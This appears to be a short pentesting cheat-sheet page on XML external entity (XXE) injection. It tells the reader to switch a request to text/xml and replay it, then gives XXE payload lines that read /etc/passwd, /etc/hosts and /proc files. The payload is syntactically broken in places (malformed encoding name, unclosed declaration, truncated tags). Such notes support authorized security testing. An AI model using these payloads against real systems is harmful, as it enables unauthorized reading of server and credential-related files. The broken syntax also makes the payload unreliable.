XML Injection Testing

Change the content type to text/xml then insert the below code. Check via repeater

<?xml version="1.0" encoding="ISO 8859 1"?>
<!DOCTYPE test [
<!ELEMENT test ANY
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><test>&xxe;</
<!ENTITY xxe SYSTEM "file:///etc/hosts" >]><test>&xxe;</
<!ENTITY xxe SYSTEM "file:///proc/self/cmdline" >]><test>&xxe;</
<!ENTITY xxe SYSTEM "file:///proc/version" >]><test>&xxe;</

Blind XXE with out-of-band interaction

PreviousSSO Vulnerabilities NextCross-origin resource sharing (CORS)

Last updated 2 years ago